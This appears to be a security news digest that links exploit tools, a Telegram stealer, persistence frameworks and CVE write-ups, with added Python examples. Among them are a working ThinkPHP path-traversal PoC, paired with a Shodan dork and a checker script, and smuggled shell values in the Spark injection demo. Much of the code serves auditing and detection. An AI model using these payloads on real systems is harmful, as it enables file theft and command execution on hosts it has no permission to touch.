Open Sourcing Pulsar, the Runtime Security Observability Tool for IoT, Powered by eBPF
blog.exein.io/pulsar
Tool website: pulsar.sh
GitHub: github.com/exein-io/pulsar
ThinkPHP 5.x arbitrary file read
Nuclei template: https://github.com/momika233/TP5_Arbitrary_file_read/blob/main/TP5_Arbitrary_file_read.yaml
PoC: {{BaseURL}}/?s=index/think\\Error/appError&errno=1&errstr=1&errline=1&errfile=../../../etc/passwd
Shodan dork: "X-Powered-By: ThinkPHP"
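Added example (my own code, not the linked Nuclei template): rebuild the PoC request above in Python and classify the response by whether it actually contains passwd records, rather than just a page that echoes the requested filename back. The sample response bodies are constructed, and the backslash in the `s` parameter is sent as a single character here.

```python
import re
import sys
import urllib.error
import urllib.parse
import urllib.request

PASSWD_TRAVERSAL = "../../../etc/passwd"  # the path used in the PoC above

# One passwd record: name:password:uid:gid:gecos:home:shell. Unanchored so it
# still matches when the debug trace page wraps the file's lines in HTML.
PASSWD_RECORD = re.compile(
    r"[A-Za-z0-9._-]+:[^:\s]*:\d+:\d+:[^:\n<]*:[^:\s<]*:[^:\s<]*"
)


def build_poc_url(base_url: str, file_path: str = PASSWD_TRAVERSAL) -> str:
    """Rebuild the PoC query string from the post on top of base_url."""
    params = {
        "s": "index/think\\Error/appError",  # Python escaping: one backslash is sent
        "errno": "1",
        "errstr": "1",
        "errline": "1",
        "errfile": file_path,
    }
    return base_url.rstrip("/") + "/?" + urllib.parse.urlencode(params, safe="/\\")


def looks_like_passwd(body: str, min_records: int = 2) -> bool:
    """True when the body carries several passwd records, root's among them;
    an error page that merely echoes the requested filename does not qualify."""
    records = PASSWD_RECORD.findall(body)
    return len(records) >= min_records and any(r.startswith("root:") for r in records)


def check_target(base_url: str, timeout: float = 10.0) -> bool:
    """Issue the PoC request and classify the response (network call: only
    run this against hosts you are authorised to test)."""
    req = urllib.request.Request(
        build_poc_url(base_url), headers={"User-Agent": "tp5-fileread-check"}
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read(200_000)
    except urllib.error.HTTPError as err:  # error pages often come back as 500
        body = err.read(200_000)
    return looks_like_passwd(body.decode("utf-8", "replace"))


# Constructed sample bodies for offline use; not captured from a real host.
SAMPLE_VULNERABLE = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
)
SAMPLE_ERROR_PAGE = "<h1>Error</h1><p>file not found: ../../../etc/passwd</p>"

if __name__ == "__main__":
    if len(sys.argv) == 2:
        print("vulnerable" if check_target(sys.argv[1]) else "not confirmed")
    else:
        print(looks_like_passwd(SAMPLE_VULNERABLE), looks_like_passwd(SAMPLE_ERROR_PAGE))
```

Requiring at least two records plus a root entry is what keeps a page that prints "../../../etc/passwd" in an error message from being reported as a hit.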
A standalone script that adds information about unpatched vulnerabilities to BloodHound based on parsed vulnerability scanner reports. Security teams can then use this data to define starting points for paths (e.g. paths to Domain Admins from vulnerable hosts) or write queries that consider lateral movement to vulnerable hosts.
Supported Scanners
Tenable Nessus
Qualys
Greenbone OpenVAS
Nmap Vuln NSE Script
https://github.com/zeronetworks/BloodHound-Tools/tree/main/VulnerabilitiesDataImport
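Added example (my own code, not part of the zeronetworks tool): the parsing step for one of the supported inputs, an nmap `--script vuln` XML report, turned into a list of vulnerable hosts and a Cypher query from them. The XML is constructed; mapping the PTR hostname onto BloodHound's `HOSTNAME.DOMAIN` computer name is an assumption, and the query uses a name list rather than whatever property the import tool actually sets.

```python
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List

# The vulns NSE library prints "State: VULNERABLE", "State: LIKELY VULNERABLE"
# or "State: NOT VULNERABLE"; a bare substring check would take all three.
VULN_STATE = re.compile(r"State:\s*(?:LIKELY )?VULNERABLE\b")


@dataclass(frozen=True)
class Finding:
    host: str      # PTR name if nmap resolved one, else the IPv4 address
    address: str
    port: int
    script: str


def parse_nmap_vuln_xml(xml_text: str) -> List[Finding]:
    """Return one Finding per (host, port, script) whose output says VULNERABLE."""
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = next((a.get("addr") for a in host.findall("address")
                     if a.get("addrtype") == "ipv4"), None)
        if addr is None:
            continue
        hn = host.find("hostnames/hostname")
        name = hn.get("name") if hn is not None else addr
        for port in host.findall("ports/port"):
            for script in port.findall("script"):
                if VULN_STATE.search(script.get("output", "")):
                    findings.append(Finding(name, addr, int(port.get("portid")), script.get("id")))
    return findings


def bloodhound_names(findings: List[Finding]) -> List[str]:
    """BloodHound names computers HOSTNAME.DOMAIN in upper case (assumption:
    the PTR name nmap saw is the AD name)."""
    return sorted({f.host.upper() for f in findings})


def cypher_paths_to_da(names: List[str], domain: str = "CORP.LOCAL") -> str:
    """Shortest paths from the vulnerable computers to Domain Admins."""
    return (
        "MATCH p = shortestPath((c:Computer)-[*1..]->(g:Group {name:'DOMAIN ADMINS@%s'})) "
        "WHERE c.name IN %s RETURN p" % (domain, names)
    )


# Constructed nmap -oX output, trimmed to the elements read above.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <hostnames><hostname name="srv01.corp.local" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="445">
        <script id="smb-vuln-ms17-010" output="&#10;  VULNERABLE:&#10;  Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)&#10;    State: VULNERABLE"/>
      </port>
      <port protocol="tcp" portid="80">
        <script id="http-csrf" output="Couldn't find any CSRF vulnerabilities."/>
      </port>
    </ports>
  </host>
  <host>
    <address addr="10.0.0.9" addrtype="ipv4"/>
    <hostnames><hostname name="ws07.corp.local" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="3389">
        <script id="rdp-vuln-ms12-020" output="&#10;  VULNERABLE:&#10;  MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability&#10;    State: NOT VULNERABLE"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

if __name__ == "__main__":
    found = parse_nmap_vuln_xml(SAMPLE_NMAP_XML)
    for f in found:
        print(f"{f.host} ({f.address}) {f.port}/tcp {f.script}")
    print(cypher_paths_to_da(bloodhound_names(found)))
```

The second host is deliberately reported as NOT VULNERABLE: any import that keys on the word "VULNERABLE" alone would mark it as a starting point and the resulting attack paths would be wrong.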
Stealer in just 3 lines with sending to telegram
https://github.com/FallenAstaroth/stink
Apache Spark Shell Command Injection CVE-2022-33891
The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. An authentication filter checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.
https://github.com/AmoloHT/CVE-2022-33891
#Apache #spark
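Added example (Python, my own code, not Spark's Scala): the flawed shape behind this CVE next to a hardened one, plus a check for abuse attempts in UI access logs. Spark's shell-based groups provider resolves a user's groups by running `bash -c "id -Gn <user>"`, and the impersonation path lets the HTTP client choose `<user>` through the `doAs` query parameter. The user-name grammar and the log lines are constructed for the demo.

```python
import re
import subprocess
import urllib.parse
from typing import List, Optional

# Minimal user-name grammar (assumption: portable-charset names, optional
# trailing $ for machine accounts, at most 32 characters).
VALID_USERNAME = re.compile(r"^[a-z_][a-z0-9_-]{0,31}\$?$")
SHELL_META = re.compile(r"[;&|`$(){}<>\n\\]")


def vulnerable_group_command(user: str) -> List[str]:
    """Flawed shape: the name is concatenated into a `bash -c` string, so
    metacharacters in it are interpreted by bash instead of being a name."""
    return ["bash", "-c", "id -Gn " + user]


def hardened_group_command(user: str) -> List[str]:
    """Fixed shape: validate the name, then pass it as its own argv element
    with no shell in between."""
    if not VALID_USERNAME.match(user):
        raise ValueError("refusing group lookup for invalid user name %r" % user)
    return ["id", "-Gn", user]


def rejects(user: str) -> bool:
    """True when the hardened lookup refuses the name."""
    try:
        hardened_group_command(user)
    except ValueError:
        return True
    return False


def lookup_groups(user: str, runner=subprocess.run) -> List[str]:
    """Resolve groups with the hardened command; [] for unknown users."""
    proc = runner(hardened_group_command(user), capture_output=True, text=True)
    return proc.stdout.split() if proc.returncode == 0 else []


def suspicious_doas(request_line: str) -> Optional[str]:
    """Decoded doAs value when a UI request carries shell metacharacters in it."""
    m = re.search(r"[?&]doAs=([^ &\"]*)", request_line)
    if not m:
        return None
    value = urllib.parse.unquote(m.group(1))
    return value if SHELL_META.search(value) else None


def scan_log(lines: List[str]) -> List[tuple]:
    """(line index, decoded doAs) for every line that looks like an attempt."""
    hits = []
    for i, line in enumerate(lines):
        value = suspicious_doas(line)
        if value is not None:
            hits.append((i, value))
    return hits


# Constructed reverse-proxy access log lines in front of a Spark UI; not real traffic.
SAMPLE_LOG = [
    '10.1.1.7 - - [13/Aug/2022:10:01:02 +0000] "GET /?doAs=alice HTTP/1.1" 200 4821',
    '10.1.1.7 - - [13/Aug/2022:10:01:09 +0000] "GET /?doAs=%60id%3E/tmp/pwned%60 HTTP/1.1" 403 912',
    '10.1.1.9 - - [13/Aug/2022:10:02:41 +0000] "GET /jobs/ HTTP/1.1" 200 7710',
]

if __name__ == "__main__":
    print(vulnerable_group_command("alice;touch /tmp/x"))
    print(rejects("alice;touch /tmp/x"), rejects("alice"))
    print(scan_log(SAMPLE_LOG))
```

Note that the second log line got a 403: the shell command runs inside the permission check, so the injection fires before any access decision is made and a denied request is not evidence that nothing executed.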
CVE-2022-26712: The POC for SIP-Bypass
https://jhftss.github.io/CVE-2022-26712-The-POC-For-SIP-Bypass-Is-Even-Tweetable/
I found some new attack surfaces in the macOS PackageKit.framework, and successfully disclosed 15+ critical SIP-Bypass vulnerabilities. Apple has addressed 12 of them with CVE assigned so far. There are still some reports in the Apple’s processing queue.…
wget-root:
If the wget binary has the SUID bit set, it does not drop the elevated privileges and can be abused to access the file system: privileged writes, or writing files outside a restricted file system. This script automates rewriting the passwd file on the victim's machine.
https://github.com/CopernicusPY/wget-root
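Added example (my own code, not the wget-root script): the check a defender or a pentester runs first, an audit for setuid copies of wget and similar file-writing tools, with the remediation command alongside. The directory list and the reason strings are this example's own choices.

```python
import os
import stat
from typing import List, Tuple

# Tools that, owned by root with the setuid bit, read or write arbitrary
# files as root (reason strings are this example's own wording).
RISKY_SUID = {
    "wget": "wget -O <path> <url> writes any file as root; --post-file <path> exfiltrates any file",
    "curl": "curl -o <path> <url> writes any file as root",
}

DEFAULT_DIRS = ("/usr/bin", "/usr/local/bin", "/bin", "/usr/sbin", "/sbin", "/opt")


def has_setuid_bit(path: str) -> bool:
    """True for a regular file (symlinks followed) carrying the setuid bit."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)


def is_setuid_root(path: str) -> bool:
    """The dangerous combination: setuid bit and owned by uid 0."""
    return has_setuid_bit(path) and os.stat(path).st_uid == 0


def find_setuid_files(dirs) -> List[str]:
    """Walk dirs and return every setuid file, de-duplicated through realpath
    so /bin -> /usr/bin merges do not list the same binary twice."""
    found = set()
    for d in dirs:
        for dirpath, _, files in os.walk(d):
            for name in files:
                p = os.path.join(dirpath, name)
                if has_setuid_bit(p):
                    found.add(os.path.realpath(p))
    return sorted(found)


def audit(dirs=DEFAULT_DIRS) -> List[Tuple[str, str]]:
    """(path, reason) for each setuid-root file whose basename is a risky tool."""
    return [
        (p, RISKY_SUID[os.path.basename(p)])
        for p in find_setuid_files(dirs)
        if os.path.basename(p) in RISKY_SUID and is_setuid_root(p)
    ]


def remediation(path: str) -> List[str]:
    """Command that removes the setuid bit; wget never needs it."""
    return ["chmod", "u-s", path]


if __name__ == "__main__":
    hits = audit()
    for path, reason in hits:
        print(f"{path}: {reason}\n  fix: {' '.join(remediation(path))}")
    if not hits:
        print("no setuid-root wget/curl found in", ", ".join(DEFAULT_DIRS))
```

`find_setuid_files` on its own is the broader list (every setuid binary on the box) that is worth comparing against a known-good baseline; `audit` narrows it to the two names that give a direct file write.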
Apache Tomcat Vulnerability Scanner:
https://github.com/p0dalirius/ApacheTomcatScanner
PowerShell module that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistence implanted in Windows machines.
https://github.com/last-byte/PersistenceSniper/
Certipy 4.0: ESC9 & ESC10, BloodHound GUI, New Authentication and Request Methods — and more!
https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7
https://github.com/ly4k/Certipy
This script finds error-based MySQLi vulnerabilities with nuclei
https://github.com/HernanRodriguez1/ScanMySQLiErrorBased-Nuclei
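Added example (my own code, not the linked nuclei template): the matching logic an error-based MySQLi check depends on, run over constructed responses. The signatures are common MySQL/MariaDB driver error strings; the probe characters, the sample endpoint and its responses are made up for the demo, and the fetch function is injectable so the same scanner runs offline against the fake server.

```python
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, List, Optional, Tuple

# Error strings that identify a MySQL/MariaDB backend leaking query errors.
MYSQL_ERROR_SIGNATURES = [
    r"You have an error in your SQL syntax",
    r"check the manual that corresponds to your (?:MySQL|MariaDB) server version",
    r"Warning: mysqli?_[a-z_]+\(\)",
    r"supplied argument is not a valid MySQL",
    r"SQLSTATE\[42000\]: Syntax error or access violation: 1064",
    r"MySqlException",
    r"com\.mysql\.(?:cj\.)?jdbc\.exceptions",
]

# Probe suffixes that break quoting in the common injection contexts.
PROBES = ["'", "\"", "')", "\\"]


def mysql_error(body: str) -> Optional[str]:
    """The first matching error signature in the body, or None."""
    for sig in MYSQL_ERROR_SIGNATURES:
        m = re.search(sig, body, re.I)
        if m:
            return m.group(0)
    return None


def http_fetch(url: str, params: Dict[str, str], timeout: float = 10.0) -> str:
    """Real fetch; keeps the body of 4xx/5xx responses, where the error usually is."""
    full = url + ("&" if "?" in url else "?") + urllib.parse.urlencode(params)
    try:
        with urllib.request.urlopen(full, timeout=timeout) as r:
            return r.read(200_000).decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.read(200_000).decode("utf-8", "replace")


def scan_params(url: str, params: Dict[str, str],
                fetch: Callable[[str, Dict[str, str]], str]) -> List[Tuple[str, str, str]]:
    """(param, probe, signature) for each parameter that triggers a DB error.
    A page that errors even on the unmodified request is skipped: that is a
    broken page, not evidence of injection, and needs manual review."""
    if mysql_error(fetch(url, params)):
        return []
    hits = []
    for name in params:
        for probe in PROBES:
            mutated = dict(params)
            mutated[name] = params[name] + probe
            sig = mysql_error(fetch(url, mutated))
            if sig:
                hits.append((name, probe, sig))
                break  # one confirmed probe per parameter is enough
    return hits


def fake_server(url: str, params: Dict[str, str]) -> str:
    """Constructed stand-in for a vulnerable endpoint: `id` goes into a
    quoted query without escaping, `page` is handled safely."""
    ident = params.get("id", "")
    if "'" in ident or "\\" in ident:
        return ("<b>Warning</b>: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result "
                "... You have an error in your SQL syntax; check the manual that corresponds "
                "to your MySQL server version for the right syntax to use near ''' at line 1")
    return "<html><body>Product %s</body></html>" % ident


if __name__ == "__main__":
    print(scan_params("http://target.example/item.php", {"id": "7", "page": "1"}, fake_server))
```

Swap `fake_server` for `http_fetch` to run it against a real target you are authorised to test; the baseline request is what keeps a permanently broken page from being reported as an injection.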
PersistAssist is a fully modular persistence framework written in C#. Every persistence technique contains a cleanup method that removes the persistence, kept separate from the persistence code itself. This is a WIP, so there are many empty classes; the initial goal of the project was to build a fully modular framework in which adding a new feature is as simple as inheriting a class and adding the code.
https://github.com/FortyNorthSecurity/PersistAssist
A Python script to exploit CVE-2022-36446, Software Package Updates RCE (authenticated) on Webmin < 1.997
Mitigation: update to Webmin >= 1.997
https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE
#webmin #rce
An automatic unpacker and logger for DotNet Framework targeting files! This tool has been unveiled at Black Hat USA 2022.
https://github.com/advanced-threat-research/DotDumper
#unpacker #DotNet